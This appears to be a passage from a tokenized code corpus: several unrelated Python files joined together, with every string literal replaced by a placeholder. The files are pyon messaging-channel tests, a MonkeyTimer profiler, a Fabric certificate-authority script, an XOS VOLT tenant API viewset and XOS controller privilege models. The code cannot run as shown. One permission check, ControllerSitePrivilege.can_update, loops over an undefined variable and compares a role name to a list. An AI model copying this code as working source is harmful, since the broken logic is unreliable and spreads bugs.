assert_called_once_with ( queue = sentinel . queue ) <EOL> def test_purge ( self ) : <EOL> transport = Mock ( ) <EOL> self . ch . on_channel_open ( transport ) <EOL> self . ch . _recv_name = NameTrio ( sentinel . ex , sentinel . queue ) <EOL> self . ch . _purge ( ) <EOL> self . ch . _transport . purge_impl . assert_called_once_with ( queue = sentinel . queue ) <EOL> @ attr ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> class TestPublisherChannel ( PyonTestCase ) : <EOL> def test_verify_service ( self , mocksendchannel ) : <EOL> PyonTestCase . test_verify_service ( self ) <EOL> def test_init ( self , mocksendchannel ) : <EOL> pubchan = PublisherChannel ( ) <EOL> def test_send_no_name ( self , mocksendchannel ) : <EOL> pubchan = PublisherChannel ( ) <EOL> self . assertRaises ( AssertionError , pubchan . send , sentinel . data ) <EOL> def test_send ( self , mocksendchannel ) : <EOL> depmock = Mock ( ) <EOL> pubchan = PublisherChannel ( ) <EOL> pubchan . _declare_exchange = depmock <EOL> pubchan . _send_name = NameTrio ( sentinel . xp , sentinel . routing_key ) <EOL> pubchan . send ( sentinel . data ) <EOL> depmock . assert_called_once_with ( sentinel . xp ) <EOL> mocksendchannel . send . assert_called_once_with ( pubchan , sentinel . data , headers = None ) <EOL> @ attr ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> class TestBidirClientChannel ( PyonTestCase ) : <EOL> def test_verify_service ( self , mocksendchannel ) : <EOL> PyonTestCase . test_verify_service ( self ) <EOL> def setUp ( self ) : <EOL> self . ch = BidirClientChannel ( ) <EOL> def test__send_with_reply_to ( self , mocksendchannel ) : <EOL> self . ch . _recv_name = NameTrio ( sentinel . xp , sentinel . queue ) <EOL> self . ch . _send ( sentinel . name , sentinel . data , headers = { sentinel . header_key : sentinel . header_value } ) <EOL> mocksendchannel . _send . assert_called_with ( self . ch , <EOL> sentinel . name , <EOL> sentinel . data , <EOL> headers = { sentinel . 
header_key : sentinel . header_value , '<STR_LIT>' : '<STR_LIT>' % ( sentinel . xp , sentinel . queue ) } ) <EOL> def test__send_with_no_reply_to ( self , mocksendchannel ) : <EOL> self . ch . _recv_name = NameTrio ( sentinel . xp , sentinel . queue ) <EOL> self . ch . _send ( sentinel . name , sentinel . data ) <EOL> mocksendchannel . _send . assert_called_with ( self . ch , sentinel . name , sentinel . data , headers = { '<STR_LIT>' : "<STR_LIT>" % ( sentinel . xp , sentinel . queue ) } ) <EOL> @ attr ( '<STR_LIT>' ) <EOL> class TestListenChannel ( PyonTestCase ) : <EOL> def setUp ( self ) : <EOL> self . ch = ListenChannel ( ) <EOL> def test__create_accepted_channel ( self ) : <EOL> newch = self . ch . _create_accepted_channel ( sentinel . transport , sentinel . msg ) <EOL> self . assertIsInstance ( newch , ListenChannel . AcceptedListenChannel ) <EOL> self . assertEquals ( newch . _transport , sentinel . transport ) <EOL> def test_accept ( self ) : <EOL> rmock = Mock ( ) <EOL> rmock . return_value = sentinel . msg <EOL> cacmock = Mock ( ) <EOL> transport = Mock ( ) <EOL> self . ch . recv = rmock <EOL> self . ch . _recv_queue . await_n = MagicMock ( ) <EOL> self . ch . _create_accepted_channel = cacmock <EOL> self . ch . on_channel_open ( transport ) <EOL> self . ch . _fsm . current_state = self . ch . S_ACTIVE <EOL> self . ch . _consuming = True <EOL> retch = self . ch . accept ( ) <EOL> self . assertEquals ( self . ch . _fsm . current_state , self . ch . S_ACCEPTED ) <EOL> cacmock . assert_called_once_with ( transport , [ sentinel . msg ] ) <EOL> retch . _recv_queue . put . assert_called_once_with ( sentinel . msg ) <EOL> self . ch . exit_accept ( ) <EOL> self . assertEquals ( self . ch . _fsm . current_state , self . ch . S_ACTIVE ) <EOL> self . assertTrue ( self . ch . _consuming ) <EOL> def test_close_while_accepted ( self ) : <EOL> rmock = Mock ( ) <EOL> rmock . return_value = sentinel . msg <EOL> cacmock = Mock ( ) <EOL> transport = Mock ( ) <EOL> self . 
# NOTE(review): this chunk begins mid-method. The statements below are the
# tail of a "close while ACCEPTED" test whose 'def' line lies before this
# view: they assert that close() while a child channel is accepted only moves
# the FSM to CLOSING, and that the real teardown (close_impl /
# _on_stop_consume) is deferred until exit_accept() fires.
        ch.recv = rmock
        self.ch._recv_queue.await_n = MagicMock()
        self.ch._create_accepted_channel = cacmock
        self.ch.on_channel_open(transport)
        self.ch._fsm.current_state = self.ch.S_ACTIVE
        self.ch._consuming = True
        self.ch.close_impl = Mock()
        self.ch._on_stop_consume = Mock()
        retch = self.ch.accept()
        self.assertEquals(self.ch._fsm.current_state, self.ch.S_ACCEPTED)
        # close while accepted: only a state change, no teardown yet
        self.ch.close()
        self.assertFalse(self.ch.close_impl.called)
        self.assertFalse(self.ch._on_stop_consume.called)
        self.assertEquals(self.ch._fsm.current_state, self.ch.S_CLOSING)
        # leaving the accepted state performs the deferred close
        self.ch.exit_accept()
        self.assertTrue(self.ch.close_impl.called)
        self.assertTrue(self.ch._on_stop_consume.called)
        self.assertEquals(self.ch._fsm.current_state, self.ch.S_CLOSED)
        self.assertFalse(self.ch._consuming)

    def test_stop_consume_while_accepted(self):
        """stop_consume() while ACCEPTED takes effect at once but leaves the FSM in ACCEPTED."""
        rmock = Mock()
        rmock.return_value = sentinel.msg
        cacmock = Mock()
        transport = Mock()
        self.ch.recv = rmock
        self.ch._recv_queue.await_n = MagicMock()
        self.ch._create_accepted_channel = cacmock
        self.ch.on_channel_open(transport)
        self.ch._fsm.current_state = self.ch.S_ACTIVE
        self.ch._consuming = True
        self.ch._on_stop_consume = Mock()
        retch = self.ch.accept()
        self.assertEquals(self.ch._fsm.current_state, self.ch.S_ACCEPTED)
        self.ch.stop_consume()
        self.assertFalse(self.ch._consuming)
        self.assertTrue(self.ch._on_stop_consume.called)
        self.assertEquals(self.ch._fsm.current_state, self.ch.S_ACCEPTED)
        # exiting accept returns the channel to ACTIVE (no close was pending)
        self.ch.exit_accept()
        self.assertEquals(self.ch._fsm.current_state, self.ch.S_ACTIVE)

    def test_AcceptedListenChannel_close_does_not_close_underlying_amqp_channel(self):
        """Closing an accepted child channel must not close the shared AMQP transport."""
        transport = Mock()
        newch = self.ch._create_accepted_channel(transport, sentinel.msg)
        newch.close()
        self.assertEquals(transport.close.call_count, <NUM_LIT:0>)


@attr('<STR_LIT>')
class TestSubscriberChannel(PyonTestCase):
    # close_impl() should destroy the queue only for anonymous queues that the
    # broker will NOT auto-delete; named or auto-delete queues are left alone.

    def test_close_does_delete_if_anonymous_and_not_auto_delete(self):
        transport = AMQPTransport(Mock())
        ch = SubscriberChannel()
        ch.on_channel_open(transport)
        ch._queue_auto_delete = False
        ch._destroy_queue = Mock()
        ch._recv_name = NameTrio(sentinel.exchange, '<STR_LIT>')
        ch.close_impl()
        ch._destroy_queue.assert_called_once_with()

    def test_close_does_not_delete_if_named(self):
        ch = SubscriberChannel()
        ch._queue_auto_delete = False
        ch._destroy_queue = Mock()
        ch._recv_name = NameTrio(sentinel.exchange, '<STR_LIT>')
        ch.close_impl()
        self.assertFalse(ch._destroy_queue.called)

    def test_close_does_not_delete_if_anon_but_auto_delete(self):
        ch = SubscriberChannel()
        ch._queue_auto_delete = True
        ch._destroy_queue = Mock()
        ch._recv_name = NameTrio(sentinel.exchange, '<STR_LIT>')
        ch.close_impl()
        self.assertFalse(ch._destroy_queue.called)


@attr('<STR_LIT>')
class TestServerChannel(PyonTestCase):

    def test__create_accepted_channel(self):
        """Accepted channel is a BidirAcceptChannel whose send name is taken from the message headers."""
        ch = ServerChannel()
        msg = [[None, {'<STR_LIT>': '<STR_LIT>'}]]
        newch = ch._create_accepted_channel(sentinel.transport, msg)
        self.assertIsInstance(newch, ServerChannel.BidirAcceptChannel)
        self.assertEquals(newch._transport, sentinel.transport)
        self.assertTrue(hasattr(newch._send_name, '<STR_LIT>'))
        self.assertTrue(hasattr(newch._send_name, '<STR_LIT>'))
        self.assertEquals(newch._send_name.exchange, '<STR_LIT>')
        self.assertEquals(newch._send_name.queue, '<STR_LIT>')


@attr('<STR_LIT>')
class TestChannelInt(IonIntegrationTestCase):
    """Integration tests driving real channels against a running container/broker."""

    def setUp(self):
        # patch the messaging configuration before starting the container
        self.patch_cfg('<STR_LIT>', {'<STR_LIT>': {'<STR_LIT>': {'<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': None}},
                                     '<STR_LIT>': CFG['<STR_LIT>']['<STR_LIT>']},
                       '<STR_LIT>': CFG['<STR_LIT>']})
        self._start_container()

    def test_consume_one_message_at_a_time(self):
        # Two background publishers emit numbered messages on two routing keys;
        # a prefetch-limited RecvChannel then consumes them one at a time to
        # exercise ack / reject(requeue) / rebind semantics.

        def every_five():
            p = self.container.node.channel(PublisherChannel)
            p._send_name = NameTrio(bootstrap.get_sys_name(), '<STR_LIT>')
            counter = <NUM_LIT:0>
            while not self.publish_five.wait(timeout=<NUM_LIT:5>):
                p.send('<STR_LIT>' + str(counter))
                counter += <NUM_LIT:1>

        def every_three():
            p = self.container.node.channel(PublisherChannel)
            p._send_name = NameTrio(bootstrap.get_sys_name(), '<STR_LIT>')
            counter = <NUM_LIT:0>
            while not self.publish_three.wait(timeout=<NUM_LIT:3>):
                p.send('<STR_LIT>' + str(counter))
                counter += <NUM_LIT:1>

        self.publish_five = Event()
        self.publish_three = Event()
        self.five_events = Queue()
        self.three_events = Queue()
        gl_every_five = spawn(every_five)
        gl_every_three = spawn(every_three)

        def listen(lch):
            """<STR_LIT>"""
            lch._queue_auto_delete = False
            lch.setup_listener(NameTrio(bootstrap.get_sys_name(), '<STR_LIT>'), '<STR_LIT>')
            lch._bind('<STR_LIT>')
            lch.start_consume()
            while True:
                try:
                    newchan = lch.accept()
                    m, h, d = newchan.recv()
                    # trailing comma-separated field carries the counter
                    count = m.rsplit('<STR_LIT:U+002C>', <NUM_LIT:1>)[-<NUM_LIT:1>]
                    if m.startswith('<STR_LIT>'):
                        self.five_events.put(int(count))
                        newchan.ack(d)
                    elif m.startswith('<STR_LIT>'):
                        self.three_events.put(int(count))
                        newchan.ack(d)
                    else:
                        raise StandardError("<STR_LIT>" % m)
                except ChannelClosedError:
                    break

        lch = self.container.node.channel(SubscriberChannel)
        gl_listen = spawn(listen, lch)

        def do_cleanups(gl_e5, gl_e3, gl_l, lch):
            # stop publishers, tear down the listener channel, reap greenlets
            self.publish_five.set()
            self.publish_three.set()
            gl_e5.join(timeout=<NUM_LIT:5>)
            gl_e3.join(timeout=<NUM_LIT:5>)
            lch.stop_consume()
            lch._destroy_queue()
            lch.close()
            gl_listen.join(timeout=<NUM_LIT:5>)
        self.addCleanup(do_cleanups, gl_every_five, gl_every_three, gl_listen, lch)

        ch = self.container.node.channel(RecvChannel)
        ch._recv_name = NameTrio(bootstrap.get_sys_name(), '<STR_LIT>')
        ch._queue_auto_delete = False
        # limit prefetch so only one message is delivered per consume window
        ch._transport.qos_impl(prefetch_count=<NUM_LIT>)

        def cleanup_channel(thech):
            thech._destroy_queue()
            thech.close()
        self.addCleanup(cleanup_channel, ch)

        ch._declare_exchange(ch._recv_name.exchange)
        ch._declare_queue(ch._recv_name.queue)
        ch._purge()
        ch._bind('<STR_LIT>')

        # wait for one publish, verify it sits unconsumed on the queue
        self.five_events.get(timeout=<NUM_LIT:10>)
        self.assertTupleEqual((<NUM_LIT:1>, <NUM_LIT:0>), ch.get_stats())
        ch.start_consume()
        time.sleep(<NUM_LIT:0.1>)
        self.assertEquals(ch._recv_queue.qsize(), <NUM_LIT:1>)
        m, h, d = ch.recv(timeout=<NUM_LIT:0>)
        self.assertEquals(m, "<STR_LIT>")
        ch.ack(d)
        self.assertRaises(PQueue.Empty, ch.recv, timeout=<NUM_LIT:0>)
        ch.stop_consume()

        # drain whatever accumulated while not consuming
        self.five_events.get(timeout=<NUM_LIT:10>)
        ch.start_consume()
        time.sleep(<NUM_LIT:0.1>)
        while True:
            try:
                m, h, d = ch.recv(timeout=<NUM_LIT:0>)
                self.assertTrue(m.startswith('<STR_LIT>'))
                ch.ack(d)
            except PQueue.Empty:
                ch.stop_consume()
                break

        # reject with requeue: the same message must come back
        self.five_events.get(timeout=<NUM_LIT:10>)
        ch.start_consume()
        time.sleep(<NUM_LIT:0.1>)
        m, h, d = ch.recv(timeout=<NUM_LIT:0>)
        self.assertTrue(m.startswith('<STR_LIT>'))
        ch.reject(d, requeue=True)
        num = self.five_events.get(timeout=<NUM_LIT:10>)
        self.assertEquals(num, <NUM_LIT:3>)
        time.sleep(<NUM_LIT:0.1>)
        expect = ["<STR_LIT>", "<STR_LIT>"]
        while True:
            try:
                m, h, d = ch.recv(timeout=<NUM_LIT:0>)
                self.assertTrue(m.startswith('<STR_LIT>'))
                self.assertEquals(m, expect.pop(<NUM_LIT:0>))
                ch.ack(d)
            except PQueue.Empty:
                ch.stop_consume()
                self.assertListEqual(expect, [])
                break

        # switch bindings to the other routing key and repeat the cycle
        while not self.three_events.empty():
            self.three_events.get(timeout=<NUM_LIT:0>)
        ch2 = self.container.node.channel(RecvChannel)
        ch2.setup_listener(NameTrio(bootstrap.get_sys_name(), "<STR_LIT>"))
        ch._destroy_binding()
        ch._bind('<STR_LIT>')
        ch2._destroy_queue()
        ch2.close()
        self.three_events.get(timeout=<NUM_LIT:10>)
        ch.start_consume()
        time.sleep(<NUM_LIT:0.1>)
        self.assertEquals(ch._recv_queue.qsize(), <NUM_LIT:1>)
        m, h, d = ch.recv(timeout=<NUM_LIT:0>)
        self.assertTrue(m.startswith('<STR_LIT>'))
        ch.ack(d)

        # reject/requeue on the new binding: redelivered message is identical
        self.three_events.get(timeout=<NUM_LIT:10>)
        time.sleep(<NUM_LIT:0.1>)
        m, h, d = ch.recv(timeout=<NUM_LIT:0>)
        ch.reject(d, requeue=True)
        ch.stop_consume()
        ch.start_consume()
        time.sleep(<NUM_LIT:0.1>)
        self.assertEquals(ch._recv_queue.qsize(), <NUM_LIT:1>)
        m2, h2, d2 = ch.recv(timeout=<NUM_LIT:0>)
        self.assertEquals(m, m2)
        ch.stop_consume()


@attr('<STR_LIT>')
class TestChannelIntLocalTransport(TestChannelInt):
    """Same integration suite, re-run over the local (in-process) transport."""

    def setUp(self):
        self.patch_cfg('<STR_LIT>', {'<STR_LIT>': {'<STR_LIT>': {'<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': None}},
                                     '<STR_LIT>': CFG['<STR_LIT>']['<STR_LIT>']},
                       '<STR_LIT>': CFG['<STR_LIT>']})
        self._start_container()
<s> """<STR_LIT>""" <EOL> from time import time <EOL> from types import MethodType <EOL> from inspect import getmembers , ismethod <EOL> from re import match <EOL> from threading import Lock <EOL> from traceback import extract_stack <EOL> from pyon . util import log <EOL> class _Wrapper ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , timer , function , name , logger ) : <EOL> self . _original = function <EOL> self . _timer = timer <EOL> self . _name = name <EOL> self . _simultaneous = <NUM_LIT:0> <EOL> self . _log = logger <EOL> def proxy ( self , * a , ** b ) : <EOL> if self . _log : <EOL> for frame in reversed ( extract_stack ( ) ) : <EOL> file = frame [ <NUM_LIT:0> ] <EOL> if not file . endswith ( '<STR_LIT>' ) : <EOL> line = frame [ <NUM_LIT:1> ] <EOL> self . _log . info ( self . _name + '<STR_LIT>' + file + '<STR_LIT::>' + str ( line ) ) <EOL> break <EOL> tuple = extract_stack ( ) [ - <NUM_LIT:2> ] <EOL> self . _simultaneous += <NUM_LIT:1> <EOL> start = self . _timer . _start_timing ( ) <EOL> try : <EOL> return self . _original ( * a , ** b ) <EOL> finally : <EOL> self . _timer . _stop_timing ( self , start ) <EOL> self . _simultaneous -= <NUM_LIT:1> <EOL> def __str__ ( self ) : <EOL> return self . _name <EOL> class _Call ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , index ) : <EOL> self . proportional_time = <NUM_LIT:0> <EOL> self . _index = index <EOL> def add_time ( self , elapsed ) : <EOL> self . proportional_time += elapsed <EOL> def start ( self , time ) : <EOL> self . _start_time = time <EOL> def stop ( self , time ) : <EOL> self . clock_time = time - self . _start_time <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % self . _index <EOL> def __repr__ ( self ) : <EOL> return self . __str__ ( ) <EOL> class MonkeyTimer ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , nooverlap = False ) : <EOL> self . _proportional_time = { } <EOL> self . _clock_time = { } <EOL> self . _total_count = { } <EOL> self . 
_lock = Lock ( ) <EOL> self . _last_tick = None <EOL> self . _currently_running = [ ] <EOL> self . _max_simultaneous = <NUM_LIT:0> <EOL> self . _call_index = <NUM_LIT:1> <EOL> self . logger = None <EOL> def set_logger ( self , logger ) : <EOL> """<STR_LIT>""" <EOL> self . logger = logger <EOL> def _add_time ( self , elapsed ) : <EOL> running_count = len ( self . _currently_running ) <EOL> if running_count : <EOL> self . _max_simultaneous = max ( self . _max_simultaneous , running_count ) <EOL> delta = elapsed / running_count <EOL> for call in self . _currently_running : <EOL> call . add_time ( delta ) <EOL> def _start_timing ( self ) : <EOL> self . _lock . acquire ( ) <EOL> this_tick = time ( ) <EOL> new_call = _Call ( self . _call_index ) <EOL> self . _call_index += <NUM_LIT:1> <EOL> new_call . start ( this_tick ) <EOL> if self . _last_tick : <EOL> self . _add_time ( this_tick - self . _last_tick ) <EOL> self . _last_tick = this_tick <EOL> self . _currently_running . append ( new_call ) <EOL> self . _lock . release ( ) <EOL> return new_call <EOL> def _stop_timing ( self , wrapper , call ) : <EOL> self . _lock . acquire ( ) <EOL> this_tick = time ( ) <EOL> call . stop ( this_tick ) <EOL> self . _add_time ( this_tick - self . _last_tick ) <EOL> self . _last_tick = this_tick <EOL> self . _currently_running . remove ( call ) <EOL> self . _lock . release ( ) <EOL> key = str ( wrapper ) <EOL> if key not in self . _proportional_time : <EOL> self . _proportional_time [ key ] = <NUM_LIT:0> <EOL> self . _clock_time [ key ] = <NUM_LIT:0> <EOL> self . _total_count [ key ] = <NUM_LIT:0> <EOL> self . _proportional_time [ key ] += call . proportional_time <EOL> self . _clock_time [ key ] += call . clock_time <EOL> self . _total_count [ key ] += <NUM_LIT:1> <EOL> def patch_function ( self , function , name , logger = None ) : <EOL> """<STR_LIT>""" <EOL> wrapper_log = logger if logger else self . 
logger <EOL> wrapper = _Wrapper ( self , function , name , wrapper_log ) <EOL> return wrapper . proxy <EOL> def patch_class_one ( self , clazz , function , name ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( clazz , '<STR_LIT>' ) : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> timer = self <EOL> class _ProxyClass ( clazz ) : <EOL> def __init__ ( self , * a , ** b ) : <EOL> orig = clazz . __dict__ [ function . __name__ ] <EOL> self . __dict__ [ function . __name__ ] = MethodType ( timer . patch_function ( orig , name ) , self , _ProxyClass ) <EOL> clazz . __init__ ( self , * a , ** b ) <EOL> _ProxyClass . _monkey_timer_patched = True <EOL> return _ProxyClass <EOL> def patch_class_all ( self , clazz , prefix , regex = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( clazz , '<STR_LIT>' ) : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> timer = self <EOL> class _ProxyClass ( clazz ) : <EOL> def __init__ ( self , * a , ** b ) : <EOL> for name , function in getmembers ( clazz , predicate = ismethod ) : <EOL> if not regex or match ( regex , name ) : <EOL> self . __dict__ [ name ] = MethodType ( timer . patch_function ( function , prefix + name ) , self , _ProxyClass ) <EOL> clazz . __init__ ( self , * a , ** b ) <EOL> _ProxyClass . _monkey_timer_patched = True <EOL> return _ProxyClass <EOL> def results ( self ) : <EOL> """<STR_LIT>""" <EOL> lines = [ "<STR_LIT>" ] <EOL> self . _lock . acquire ( ) <EOL> for key in self . _proportional_time . keys ( ) : <EOL> time = self . _proportional_time [ key ] <EOL> clocktime = self . _clock_time [ key ] <EOL> count = self . _total_count [ key ] <EOL> lines . append ( "<STR_LIT>" % ( key , time , count , time / count , clocktime , count , clocktime / count ) ) <EOL> self . _lock . release ( ) <EOL> return "<STR_LIT:\n>" . join ( lines ) + ( "<STR_LIT>" % self . _max_simultaneous ) <EOL> def reset ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _lock . acquire ( ) <EOL> self . _proportional_time = { } <EOL> self . 
_clock_time = { } <EOL> self . _total_count = { } <EOL> self . _lock . release ( ) </s>
<s> from __future__ import with_statement <EOL> from fabric . api import * <EOL> import os <EOL> import re <EOL> import time <EOL> ca_config_content = "<STR_LIT>" <EOL> ca_dir = None <EOL> def setcadir ( ) : <EOL> global ca_dir <EOL> if not ca_dir : <EOL> ca_dir = prompt ( '<STR_LIT>' , default = '<STR_LIT>' ) <EOL> if '<STR_LIT>' in ca_dir : <EOL> homedir = os . getenv ( "<STR_LIT>" ) <EOL> ca_dir = os . path . join ( homedir , ca_dir . strip ( '<STR_LIT>' ) ) <EOL> def mkca ( ) : <EOL> setcadir ( ) <EOL> global ca_dir <EOL> if os . path . exists ( ca_dir ) : <EOL> do_del = prompt ( '<STR_LIT>' % ca_dir , default = '<STR_LIT:Y>' ) <EOL> if do_del == '<STR_LIT:Y>' or do_del == '<STR_LIT:y>' : <EOL> local ( '<STR_LIT>' % ca_dir ) <EOL> local ( '<STR_LIT>' % ca_dir ) <EOL> local ( '<STR_LIT>' % ca_dir ) <EOL> local ( '<STR_LIT>' % ca_dir ) <EOL> rootca_common_name = prompt ( '<STR_LIT>' , default = '<STR_LIT>' ) <EOL> rootca_email_address = prompt ( '<STR_LIT>' , default = '<STR_LIT>' ) <EOL> revocation_url = prompt ( '<STR_LIT>' , default = '<STR_LIT>' ) <EOL> o_path = os . path . join ( ca_dir , "<STR_LIT>" ) <EOL> o = open ( o_path , '<STR_LIT>' ) <EOL> openssl_cnf = ca_config_content <EOL> openssl_cnf = re . sub ( '<STR_LIT>' , rootca_common_name , openssl_cnf ) <EOL> openssl_cnf = re . sub ( '<STR_LIT>' , rootca_email_address , openssl_cnf ) <EOL> openssl_cnf = re . sub ( '<STR_LIT>' , revocation_url , openssl_cnf ) <EOL> o . write ( openssl_cnf ) <EOL> o . 
close ( ) <EOL> local ( '<STR_LIT>' % ca_dir ) <EOL> local ( "<STR_LIT>" % ca_dir ) <EOL> local ( '<STR_LIT>' % ca_dir ) <EOL> def mkrootcert ( ) : <EOL> setcadir ( ) <EOL> global ca_dir <EOL> local ( '<STR_LIT>' % ca_dir ) <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' % ( ca_dir ) <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> def mkcontainercert ( ) : <EOL> setcadir ( ) <EOL> global ca_dir <EOL> key_duration = prompt ( '<STR_LIT>' , default = '<STR_LIT>' ) <EOL> key_filename = prompt ( '<STR_LIT>' , default = '<STR_LIT>' ) <EOL> local ( '<STR_LIT>' % ( ca_dir , key_filename , key_filename , key_duration ) ) <EOL> local ( '<STR_LIT>' % ( ca_dir , key_filename , key_filename ) ) <EOL> local ( '<STR_LIT>' % ( ca_dir , key_filename ) ) <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' % ( ca_dir , key_filename , ca_dir , key_filename ) <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' </s>
from rest_framework.decorators import api_view
from rest_framework.response import Response
from rest_framework.reverse import reverse
from rest_framework import serializers
from rest_framework import generics
from rest_framework import status
from core.models import *
from django.forms import widgets
from services.cord.models import VOLTTenant, VOLTService, CordSubscriberRoot
from xos.apibase import XOSListCreateAPIView, XOSRetrieveUpdateDestroyAPIView, XOSPermissionDenied
from api.xosapi_helpers import PlusModelSerializer, XOSViewSet, ReadOnlyField


def get_default_volt_service():
    """Return the id of the first VOLTService, or None if none exist."""
    volt_services = VOLTService.get_service_objects().all()
    if volt_services:
        return volt_services[<NUM_LIT:0>].id
    return None


class VOLTTenantForAPI(VOLTTenant):
    """Proxy model exposing API-friendly accessors on top of VOLTTenant."""

    class Meta:
        proxy = True
        app_label = "<STR_LIT>"

    @property
    def subscriber(self):
        # expose the subscriber_root FK as a plain id for serialization
        return self.subscriber_root.id

    @subscriber.setter
    def subscriber(self, value):
        self.subscriber_root = value

    @property
    def related(self):
        # summary dict of linked vCPE / instance details for API consumers
        related = {}
        if self.vcpe:
            related["<STR_LIT>"] = self.vcpe.id
            if self.vcpe.instance:
                related["<STR_LIT>"] = self.vcpe.instance.id
                related["<STR_LIT>"] = self.vcpe.instance.name
                related["<STR_LIT>"] = self.vcpe.wan_container_ip
                if self.vcpe.instance.node:
                    related["<STR_LIT>"] = self.vcpe.instance.node.name
        return related


class VOLTTenantSerializer(PlusModelSerializer):
    """DRF serializer for VOLTTenantForAPI."""
    id = ReadOnlyField()
    service_specific_id = serializers.CharField(required=False)
    s_tag = serializers.CharField()
    c_tag = serializers.CharField()
    subscriber = serializers.PrimaryKeyRelatedField(queryset=CordSubscriberRoot.get_tenant_objects().all(), required=False)
    related = serializers.DictField(required=False)
    # fields handled via model properties rather than DB columns
    property_fields = ["<STR_LIT>"]
    humanReadableName = serializers.SerializerMethodField("<STR_LIT>")

    class Meta:
        model = VOLTTenantForAPI
        fields = ('<STR_LIT>', '<STR_LIT:id>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>')

    def getHumanReadableName(self, obj):
        return obj.__unicode__()


class VOLTTenantViewSet(XOSViewSet):
    """REST viewset for VOLT tenants, filterable by s_tag / c_tag."""
    base_name = "<STR_LIT>"
    method_name = "<STR_LIT>"
    method_kind = "<STR_LIT>"
    queryset = VOLTTenantForAPI.get_tenant_objects().all()
    serializer_class = VOLTTenantSerializer

    @classmethod
    def get_urlpatterns(self, api_path="<STR_LIT>"):
        patterns = super(VOLTTenantViewSet, self).get_urlpatterns(api_path=api_path)
        return patterns

    def list(self, request):
        queryset = self.filter_queryset(self.get_queryset())
        # tags live in the attribute store, so filter in Python then narrow
        # the queryset by the matching ids
        c_tag = self.request.query_params.get('<STR_LIT>', None)
        if c_tag is not None:
            ids = [x.id for x in queryset if x.get_attribute("<STR_LIT>", None) == c_tag]
            queryset = queryset.filter(id__in=ids)
        s_tag = self.request.query_params.get('<STR_LIT>', None)
        if s_tag is not None:
            ids = [x.id for x in queryset if x.get_attribute("<STR_LIT>", None) == s_tag]
            queryset = queryset.filter(id__in=ids)
        serializer = self.get_serializer(queryset, many=True)
        return Response(serializer.data)
<s> import os <EOL> import datetime <EOL> from collections import defaultdict <EOL> from django . db import models <EOL> from django . db . models import F , Q <EOL> from core . models import PlCoreBase , User , Controller <EOL> from core . models . plcorebase import StrippedCharField <EOL> from core . models import Controller , ControllerLinkManager , ControllerLinkDeletionManager <EOL> class ControllerUser ( PlCoreBase ) : <EOL> objects = ControllerLinkManager ( ) <EOL> deleted_objects = ControllerLinkDeletionManager ( ) <EOL> user = models . ForeignKey ( User , related_name = '<STR_LIT>' ) <EOL> controller = models . ForeignKey ( Controller , related_name = '<STR_LIT>' ) <EOL> kuser_id = StrippedCharField ( null = True , blank = True , max_length = <NUM_LIT:200> , help_text = "<STR_LIT>" ) <EOL> class Meta : <EOL> unique_together = ( '<STR_LIT:user>' , '<STR_LIT>' ) <EOL> def __unicode__ ( self ) : return u'<STR_LIT>' % ( self . controller , self . user ) <EOL> @ staticmethod <EOL> def select_by_user ( user ) : <EOL> if user . is_admin : <EOL> qs = ControllerUser . objects . all ( ) <EOL> else : <EOL> users = User . select_by_user ( user ) <EOL> qs = ControllerUser . objects . filter ( user__in = users ) <EOL> return qs <EOL> def can_update ( self , user ) : <EOL> return user . can_update_root ( ) <EOL> class ControllerSitePrivilege ( PlCoreBase ) : <EOL> objects = ControllerLinkManager ( ) <EOL> deleted_objects = ControllerLinkDeletionManager ( ) <EOL> controller = models . ForeignKey ( '<STR_LIT>' , related_name = '<STR_LIT>' ) <EOL> site_privilege = models . ForeignKey ( '<STR_LIT>' , related_name = '<STR_LIT>' ) <EOL> role_id = StrippedCharField ( null = True , blank = True , max_length = <NUM_LIT:200> , db_index = True , help_text = "<STR_LIT>" ) <EOL> class Meta : <EOL> unique_together = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def __unicode__ ( self ) : return u'<STR_LIT>' % ( self . controller , self . 
site_privilege ) <EOL> def can_update ( self , user ) : <EOL> if user . is_readonly : <EOL> return False <EOL> if user . is_admin : <EOL> return True <EOL> cprivs = ControllerSitePrivilege . objects . filter ( site_privilege__user = user ) <EOL> for cpriv in dprivs : <EOL> if cpriv . site_privilege . role . role == [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> return True <EOL> return False <EOL> @ staticmethod <EOL> def select_by_user ( user ) : <EOL> if user . is_admin : <EOL> qs = ControllerSitePrivilege . objects . all ( ) <EOL> else : <EOL> cpriv_ids = [ cp . id for cp in ControllerSitePrivilege . objects . filter ( site_privilege__user = user ) ] <EOL> qs = ControllerSitePrivilege . objects . filter ( id__in = cpriv_ids ) <EOL> return qs <EOL> class ControllerSlicePrivilege ( PlCoreBase ) : <EOL> objects = ControllerLinkManager ( ) <EOL> deleted_objects = ControllerLinkDeletionManager ( ) <EOL> controller = models . ForeignKey ( '<STR_LIT>' , related_name = '<STR_LIT>' ) <EOL> slice_privilege = models . ForeignKey ( '<STR_LIT>' , related_name = '<STR_LIT>' ) <EOL> role_id = StrippedCharField ( null = True , blank = True , max_length = <NUM_LIT:200> , db_index = True , help_text = "<STR_LIT>" ) <EOL> class Meta : <EOL> unique_together = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def __unicode__ ( self ) : return u'<STR_LIT>' % ( self . controller , self . slice_privilege ) <EOL> def can_update ( self , user ) 